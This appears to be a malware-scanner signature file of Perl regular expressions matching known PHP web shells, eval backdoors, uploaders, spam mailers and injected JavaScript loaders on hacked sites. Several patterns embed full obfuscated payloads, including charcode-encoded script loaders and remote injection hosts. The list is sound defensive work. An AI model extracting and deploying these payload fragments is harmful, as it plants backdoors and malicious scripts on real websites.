qr/<\?php\s+\/\*([A-z0-9_]{1,20})\*\/\s+\@include \"\\057ho.+?ic\\157\";\s+\/\*([A-z0-9_]{1,20})\*\/\s+echo \@file_get_contents\(\'index\.html\.bak\.bak\'\);/is,
qr/<\?php \$GLOBALS\[\'([A-z0-9_]{1,20})\'\]=Array\(\'str_\' \.\'rot13\',\'pack\',\'st\' \.\'rrev\'\); \?>/is,
qr/<\?php function ([A-z0-9_]{1,20})\(\$i\)\{\$a=Array\(\"([A-z0-9_]{1,20})\",\"([A-z0-9_]{1,20})\",\"([A-z0-9_]{1,20})\",\"([A-z0-9_]{1,20})\",\"H*\"\);return \$a\[\$i\];\} \?>/is,
qr/<\?php function ([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\)\{return isset\(\$_COOKIE\[\$([A-z0-9_]{1,20})\]\)\?\$_COOKIE\[\$([A-z0-9_]{1,20})\].+?if\(\!empty\(\$([A-z0-9_]{1,20})\)\)\{\$([A-z0-9_]{1,20})=\$GLOBALS\[\'([A-z0-9_]{1,20})\'\]\[0\]\(\@\$GLOBALS\[\'([A-z0-9_]{1,20})\'\]\[1\]\(.+?if\(isset\(\$([A-z0-9_]{1,20})\)\)\{\@eval\(\$([A-z0-9_]{1,20})\);exit\(\);\}\}/is,
qr/<\?php error_reporting\(0\);chmod\(basename\(\$_SERVER\[\"PHP_SELF\"\]\), 0444\);echo\(\"\#0x2525\"\);if\(isset\(\$_GET\[\"u\"\]\)\)\{echo\'<form action=\"\" method=\"post\" enctype=\"multipart\/form-data\" name=\"uploader\" id=\"uploader\">\';echo\'<input type=\"file\" name=\"file\" size=\"30\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"><\/form>\';if\(\$_POST\[\'_upl\'\]==\"Upload\"\)\{if\(\@copy\(\$_FILES\[\'file\'\]\[\'tmp_name\'\],\$_FILES\[\'file\'\]\[\'name\'\]\)\)\{echo\'Success\';\}else\{echo\'Fail\';\}\};\};/is,
qr/<script type=\'text\/javascript\' src=\'https:\/\/stat\.uustoughtonma\.org\/stats\.js.+?\'><\/script><script type=\'text\/javascript\' src=\'https:\/\/cdn\.allyouwant\.online\/main\.js.+?\'><\/script>/is,
qr/<script language=javascript>eval\(String\.fromCharCode\(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 53, 48, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125\)\);<\/script>/is,
qr/eval\(String\.fromCharCode\(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 53, 48, 44, 32, 52, 54, 44, 32, 53, 48, 44, 32, 52, 54, 44, 32, 53, 48, 44, 32, 52, 54, 44, 32, 53, 48, 44, 32, 52, 54, 44, 32, 53, 48, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125\)\);/is,
qr/<script language=javascript>var _0xfcc4=\[\"\\x66\\x72.+?\\x74\\x68\"\];var url=String\[_0xfcc4\[0\]\]\(104.+?\]\)\{n= false\}\};if\(n== true\)\{a\(\)\}\}<\/script>/is,
qr/var _0xfcc4=\[\"\\x66\\x72.+?\\x74\\x68\"\];var url=String\[_0xfcc4\[0\]\]\(104.+?\]\)\{n= false\}\};if\(n== true\)\{a\(\)\}\}/is,
qr/<\?php \@file_put_contents\(\'([A-z0-9_]{1,20})\'\,\'<\?php \'\.base64_decode\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\); \@include\(\'([A-z0-9_]{1,20})\'\); \@unlink\(\'([A-z0-9_]{1,20})\'\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'find \/ -type f -name \"\*\" \| xargs grep -rl \"<head\"\';\s+\$([A-z0-9_]{1,20}) = \"<script language=javascript>eval\(String\.fromCharCode\(.+?\@system\(\"chmod 777 \"\.\$([A-z0-9_]{1,20})\);\s+\@file_put_contents\(\$([A-z0-9_]{1,20}),\$([A-z0-9_]{1,20})\);\s+echo \$([A-z0-9_]{1,20});\s+\}\s+\}\s+\}/is,
qr/eval\(String\.fromCharCode\(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 53, 49, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125\)\);/is,
qr/<\?php\s+error_reporting\(E_ERROR\);set_time_limit\(0\);\s+if\(isset\(\$_POST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\s+\$tofile=\'40\d\.php\';\s+\$([A-z0-9_]{1,20}) =base64_decode\(strtr\(\$_POST\[\'([A-z0-9_]{1,20})\'\], \'\-\_,\', \'\+\/=\'\)\);\s+\$([A-z0-9_]{1,20})=\'<\?php \'\.\$([A-z0-9_]{1,20})\.\'\?>\';\s+\@file_put_contents\(\$tofile,\$([A-z0-9_]{1,20})\);\s+require_once\(\'40\d\.php\'\);\s+\@unlink\(\$tofile\);\s+exit;\s+\}\s+\?>/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/ \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \".+?function ([A-z0-9_]{1,30})\(\$\w,\$\w,\$\w\)\{return \$\w\.\$\w\.\$\w;\}\$.+?\(\"o\\x64e\",chr\(40\),\"\"\);\$.+?\"\.\$([A-z0-9_]{1,20});\$([A-z0-9_]{1,20})\(\'\', \'\}\'\.\$([A-z0-9_]{1,20})\.\'\/\/\'\);\s+\?>/is,
qr/<\?php function ([A-z0-9_]{1,30})\(\$\w,\$\w,\$\w\)\{return \$\w\.\$\w\.\$\w;\}\$.+?\(\"\\x65va\",chr\(108\),\"\"\.chr\(40\)\);\$.+?\'\"\.\$([A-z0-9_]{1,20});\$([A-z0-9_]{1,20})\(\'\', \'\}\'\.\$([A-z0-9_]{1,20})\.\'\/\/\'\);/is,
qr/<\?php\s+if\(isset\(\$_POST\[\'([A-z0-9_]{1,30})\'\]\)\)\{\s+\$index=\$_SERVER\[\'DOCUMENT_ROOT\'\]\.base64_decode\(strtr\(\$_POST\[\'filename\'\],\'\-\_,\',\'\+\/=\'\)\);.+?if\(strlen\(\$\w\)<300\)\{echo \'indexcode is null\';exit;\}\s+if\(file_exists\(\$index\)\)\{\@chmod\(\$index,0755\);\@unlink\(\$index\);\}\@file_put_contents\(\$index,\$\w\);echo \'ok\';\s+\}\s+\?>/is,
qr/\*\/ \@ini_set\(\'display_errors\',\'off\'\); \@ini_set\(\'log_errors\',0\); \@ini_set\(\'error_log\',NULL\);.+?\$not_found_report = strrev \(.+?\$not_found_page\.\'\"><\/script><\/noindex><\/nofollow>\';\} \?><\?php \/\*/is,
qr/<\?php.+?\$lyrics3size\s+= strrev\(substr\(strrev\(\$lyrics3_id3v1\), 9, 6\)\) + 6 + strlen\(\'LYRICS200\'\);.+?public function IntString2Bool\(\$char\) \{.+?\} \*\//is,
qr/<\?php\s+\/\*\*\s+\* SimplePie.+?if\(\!is_function_enabled\(\'base64_decode\'\)\)\{\$errors\.=\"I_have_problem_with_base64_decode\\t\";\$errorsforlocal\.=.+?\}\s+\} \*\//is,
qr/<\?php if\(isset\(\$_POST\[\"([A-z0-9_]{1,20})\"\]\)\)\{eval\(stripslashes\(\$_POST\[\"([A-z0-9_]{1,20})\"\]\)\);exit;\}; \?>/is,
qr/\*\/\s+\@\$wordpress404=\"e\\x76.+?\$wordpress401\(\$wp\[30\]\.\$wp\[31\]\.\$wp\[27\]\.\$wp\[30\]\.\$wp\[4\],\$wordpress404,\"\"\);\s+\/\*/is,
qr/<\?php.+?if\(empty\(\$_GET\[\'ineedthispage\'\]\)\)\{ini_set\(\'display_errors\',\"Off\"\);ignore_user_abort\(1\);\$.+?if\(\!empty\(\$_COOKIE\[\'PHPSSIDDD2\'\]\)\)\{\$.+?\)\];\}return\$([A-z0-9_]{1,20});\};\s+\/\/item->alias\s+\?>/is,
qr/if\(isset\(\$_REQUEST\[\'bot\'\]\)\) assert\(stripslashes\(\$_REQUEST\[bot\]\)\);/is,
qr/<\?php\s+class XYZ_Logger\s+\{.+?\$this->backdoorFile\(\$path\);\s+\}\s+\}\s+\$fabLicense = <<<EOF\s+<\?php \/\*.+?if \(\@\$_GET\[\'rm\'\]\) \{\s+\@unlink\(\_\_FILE\_\_\);\s+\}/is,
qr/<\?php\s+\$combatwork=\"yes\";.+?\$linkstable = \'wp_old_lcache\';.+?mysqli_close\(\$dbcon\);return\$row_count;\}\}\?>/is,
qr/<\?php\s+header\(.+?array\(\'index\.php\',\'index\.html\',\'index\.htm\',\'index\.shtml\',\'index\.html\.bak\.bak\',\'index\.html\.bak\',\'default\.htm\',\'default\.html\'\);.+?function traverse\(\$path = \'\.\'\) \{.+?return \$file_array;\s+\}/is,
qr/<\?php \$([A-z0-9_]{1,20}) = array\(.+?\);\$([A-z0-9_]{1,20}) = array\(\'base\' ,\'64_d\' ,\'ecod\' ,\'e\'\); \$([A-z0-9_]{1,20}) = array\(\'gz\', \'un\', \'co\', \'mp\', \'re\', \'ss\'\) ;\$.+?\) \) \) \) ; \?>/is,
qr/<\?php\s+if\(isset\(\$_GET\[\'fuck\'\]\) \&\& \$_GET\[\'fuck\'\] == \'1\'\)\{\s+\$name=\'simple\.php\';\/\/.+?unlink\(\"\.\/get\.php\"\);\s+\}else\{\s+echo \"the file is ok\.\.\.\.\";\s+\}/is,
qr/eval\(str_rot13\(\'([A-z0-9_]{1,20}) ([A-z0-9_]{1,20})\(\)\{([A-z0-9_]{1,20})\(\!\(.+?\(\);\'\)\);/is,
qr/eval\(str_rot13\(\'.+?\(\_\_SVYR\_\_\)\.\"\/.+?\}\}([A-z0-9_]{1,20})\(\);\'\)\);/is,
qr/ob_start\(\"security_update\"\); function security_update\(\$buffer\)\{return \$buffer\.base64_decode\(.+?\'\);\}/is,
qr/<\?php\s+\/\*\*\s+\* Leaf PHP Mailer by \[leafmailer\.pw\].+?\$password =.+?\$code_=\'.+?\$ccc=str_rot13\(gzinflate\(base64_decode\(\$code_\)\)\);\s+eval\(\$ccc\);\s+\?>/is,
qr/<\?php\s+error_reporting\(0\);\s+\$file=\"\.\/public_html\/error\.php\";\s+\$shellcode = \(\"<\? eval\(base64_decode\(.+?\'\)\); \?>\"\);\s+\$fopen=fopen\(\$file,\"a\+\"\);\s+\$fwrite=fwrite\(\$fopen,\$shellcode\);\s+\$fclose=fclose\(\$fopen\);\s+\?>/is,
qr/<\?php \$GLOBALS\[.+?foreach \(\$GLOBALS\[\$GLOBALS\[\'([A-z0-9_]{1,20})\'\].+?\$([A-z0-9_]{1,20}) = \@\$GLOBALS\[\$GLOBALS\[.+?elseif \(\$([A-z0-9_]{1,20})\[\$GLOBALS\[.+?eval\(\$([A-z0-9_]{1,20})\[\$GLOBALS\[\'([A-z0-9_]{1,20})\'\]\[\d\]\]\);\s+\}\s+\}/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'g\'\. \'z\'\. \'u\'\. \'n\'\. \'c\'\. \'o\'\. \'m\'\. \'p\'\. \'r\'\. \'e\'\. \'s\'\. \'s\';\$([A-z0-9_]{1,20}) = \'ba\' \.\'se\' \.\'64\' \.\'_d\' \.\'ec\' \.\'od\' \.\'e\';\$([A-z0-9_]{1,20}) = \'imp\' \.\'lod\' \.\'e\';\$([A-z0-9_]{1,20}) = array\(\".+?\)\)\)\); \?>/is,
qr/<\?php.+?\$default_charset=\'Wind\'\.\'o\.\'\.\'ws-12\'\.\'51\';\s+\$default_action=\'F\'\.\'il\'\.\'esMan\';\s+\$color=\'\#d\'\.\'f5\';\s+\$default_use_ajax=true;\s+\$JFactory = strrev\(\'edo\'\.\'c\'\.\'ed_4\'\.\'6e\'\.\'sab\'\);\s+\$JComponentHelper = strrev\(\'ecalp\'\.\'er\'\.\'_ge\'\.\'rp\'\);.+?\\x29\\x29\\x3B\",\"\.\"\);\s+\?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = array\(\'.+?array\(\'b\' ,\'a\' ,\'s\' ,\'e\' ,\'6\' ,\'4\' ,\'_\' ,\'d\' ,\'e\' ,\'c\' ,\'o\' ,\'d\' ,\'e\'\); \$([A-z0-9_]{1,20}) = array\(\'g\', \'z\', \'u\', \'n\', \'c\', \'o\', \'m\', \'p\', \'r\', \'e\', \'s\', \'s\'\) ;\$.+?\) \) \) \) ; \?>/is,
qr/<\?php echo eval\(base64_decode\(str_replace\(\'\*\',\'a\',str_replace\(\'%\',\'B\',str_replace\(\'~\',\'F\',str_replace\(\'_\',\'z\',str_replace\(\'\$\',\'x\',str_replace\(\'\@\',\'d\',str_replace\(\'^\',\'3\',str_rot13\(.+?\)\)\)\)\)\)\)\)\)\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'\'\.chr\(115\)\.\'t\'\.chr\(114\)\.\'r\'\.chr\(101\)\.\'v\';\$([A-z0-9_]{1,20}) = array\(.+?\$([A-z0-9_]{1,20})\(\'ed\'\.chr\(111\)\.\'ced_46\'\.chr\(101\)\.\'\'\.chr\(115\)\.\'\'\.chr\(97\)\.\'\'\.chr\(98\)\.\'\'\);\$.+?\)\)\)\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'s\'\.chr\(116\)\.\'r\'\.chr\(114\)\.\'ev\';\$([A-z0-9_]{1,20}) = array\(.+?\$([A-z0-9_]{1,20})\(\'edo\'\.\'ced\'\.\'_46\'\.\'esa\'\.\'b\'\);\$.+?\$([A-z0-9_]{1,20})\(\'eta\'\.\'lfn\'\.\'izg\'\);eval\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\'\',\$([A-z0-9_]{1,20})\)\)\)\); \?>/is,
qr/<\?php if\(empty\(\$_GET\[\'ineedthispage\'\]\) \&\& \$_SERVER\[\'REQUEST_URI\'\]\!=\"\/\" \&\& \$_SERVER\[\'REQUEST_URI\'\]\!=\"\/index\.php\" \&\& \!empty\(\$_SERVER\[\'REQUEST_URI\'\]\)\) \{ini_set\(\'display_errors\',\"Off\"\);ignore_user_abort\(1\);\$.+?\.\"\\\(\/\",\"II\"\.randStringfrpernames\(\)\.\"\(\",\$.+?\};\s+\?>/is,
qr/<\?php.+?\*\/\s+\$lyrics3size=\'\'\.\'b\'\.\'\'\.\'a\'\.\'\'\.\'se\'\.\(8768\/137\)\.\'_de\'\.\'\'\.\'c\'\.\'\'\.\'ode\';\s+\$lyrics3sizeV2 = \"ass\"; \$lyrics3sizeV2 \.= \"ert\"; \@\$lyrics3sizeV2\(\$lyrics3size\(.+?\} \*\//is,
qr/<\?php \$([A-z0-9_]{1,20}) = array\(.+?array\(\'b\' ,\'a\' ,\'s\' ,\'e\' ,\'6\' ,\'4\' ,\'_\' ,\'d\' ,\'e\' ,\'c\' ,\'o\' ,\'d\' ,\'e\'\); \$([A-z0-9_]{1,20}) = array\(\'gzu\', \'nco\', \'mpr\', \'ess\'\) ;\$.+?\) \) \) \) ; \?>/is,
qr/<\?php \$user_agent_to_filter = array\( \"\#Ask\\s\*Jeeves\#i\", \"\#HP\\s\*Web\\s\*PrintSmart\#i\",.+?\$result = curl_exec\(\$ch\);\s+curl_close \(\$ch\);\s+echo \$result;\}\?>/is,
qr/<script language=javascript>var _0xfcc4=\[\"\\x66.+?true\)\{a\(\)\}\}<\/script>/is,
qr/<\?php if\(\$_REQUEST\[\"([A-z0-9_]{1,20})\"\]\)\{ if\(md5\(\$_REQUEST\[\"([A-z0-9_]{1,20})\"\]\) === \"([A-z0-9_]{20,})\"\) \{ eval\(base64_decode\(\$_REQUEST\[\"([A-z0-9_]{1,20})\"\]\)\); \}\} \?>/is,
qr/<\?php\s+set_time_limit\(300\);\s+function getRoot\(\$urlPath, \$scriptPath\) \{.+?foreach\(\$dirs as \$dir\) \{\s+\$f = \"\$dir\/index\.php\";\s+if \(is_writable\(\$f\)\) \{\s+echo \"<kuku>\$f<\/kuku>\";\s+\}\s+\}\s+\?>/is,
qr/<\?php \$a=base64_decode\(.+?\);\@eval\(\$a\); \?>/is,
qr/<\?php\s+if \(\!isset\(\$_COOKIE\[\'([A-z0-9_]{20,})\'\]\)\) \{header\(\'HTTP\/1\.0 404 Not Found\'\);exit;\} \?>/is,
qr/<\?php\s+\$([A-z0-9_]{1,20})=\'1\';\s+\$([A-z0-9_]{1,20})=base64_decode\(.+?\$\{\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"\}.+?\$\{\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"\}\[\"\\x7a\\x72\\x5f\\x7a\\x5f\\x7a\\x72\\x5f\\x7a\\x72\"\]\(\);\?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \"\/.+?\";function ([A-z0-9_]{1,20})\(\$\w,\$\w,\$\w\)\{return \$\w\.\$\w\.\$\w;\}\$.+?\(\"o\\x64e\",chr\(40\),\"\"\);\$.+?\(\'\', \'\}\'\.\$([A-z0-9_]{1,20})\.\'\/\/\'\);/is,
qr/<\?php\s+\/\*\*\s+\* SAPE\.ru.+?class SAPE_base.+?function get_sape\(\) \{\s+\$ne = new SAPE_client\(\);\s+return \'<div style=\"position\:absolute;overflow\:auto;width\:0\">\'\.\$ne->return_links\(3\)\.\'<\/div>\';\s+\}/is,
qr/<\?php\s+\/\/Bksmile \*\*\(RooTTN\)\*\*.+?\@\$passwd = file_get_contents\(\'\/home\/\'\.\$user\.\'\/etc\/\'\.\$t\.\'\/shadow\'\);.+?fclose\(\$connection\);\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+\$testa = \$_POST\[\'veio\'\];\s+if\(\$testa \!= \"\"\) \{.+?<\?php echo \$OS = \@PHP_OS; \?><\/span><\/p><\/td>\s+<\/tr>\s+<\/table>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+\/\*\s+\* webadmin\.php - a simple Web-based file manager.+?<td colspan=\"\' \. \$cols \. \'\">\' \. phrase\(\$phrase, \$args\) \. \'<\/td>\s+<\/tr>\s+\';\s+\}\s+\?>/is,
qr/<\?php\s+\@set_time_limit\(0\);\s+if\(isset\(\$_POST\[\'send\'\]\)\)\s+\{.+?OYA PUT YOUR LETTER BEFORE YOU SPAM.+?\$voy\+\+;\s+\}\s+\?><\/DIV>\s+<\/div>\s+<\/form>/is,
qr/<\?php \$\{\"\\x47\\x4c\\x4f\\x42ALS\"\}.+?if\(SERVICEMODE\)echo\$\{\$\{\"\\x47\\x4cO\\x42\\x41\\x4cS\"\}\[\"\\x6f\\x68\\x63\\x6ar\\x72\\x70\\x62di\\x72\"\]\};echo \"<\/\\x62\\x6fd\\x79\\x3e\\n<\/html>\\n\";\$translation->End\(\)\;\s+?>/is,
qr/<\?php\s+if\(!defined\(\'_NET\'\)\)\s+\{\s+error_reporting\(0\);\s+\$NET=\'shl-ed1\';\s+define\(\'_NET\',\$NET\);.+?\$_SERVER\[\'SERVER_NAME\'\]\)\);echo \$pinj_57;exit;\}\}\}\}\s+\}\s+\/\*,\.\*\/\s+\?>/is,
qr/<\?php\s+mb_internal_encoding\(\"UTF-8\"\);\s+error_reporting\(0\);\s+\$DS=DIRECTORY_SEPARATOR;\s+if\(!isset\(\$ex_links\)\|\|!isset\(\$ex_redirect\)\).+?if\(!file_exists\(\$MYDIR\)\)\{\@mkdir\(\$MYDIR\);\}.+?\$mp_15=\$mp_15\+1;\}return \$mp_274;\} \?>/is,
qr/<\?php eval\(gzuncompress\(base64_decode\(.+?\'\)\)\);\?>/is,
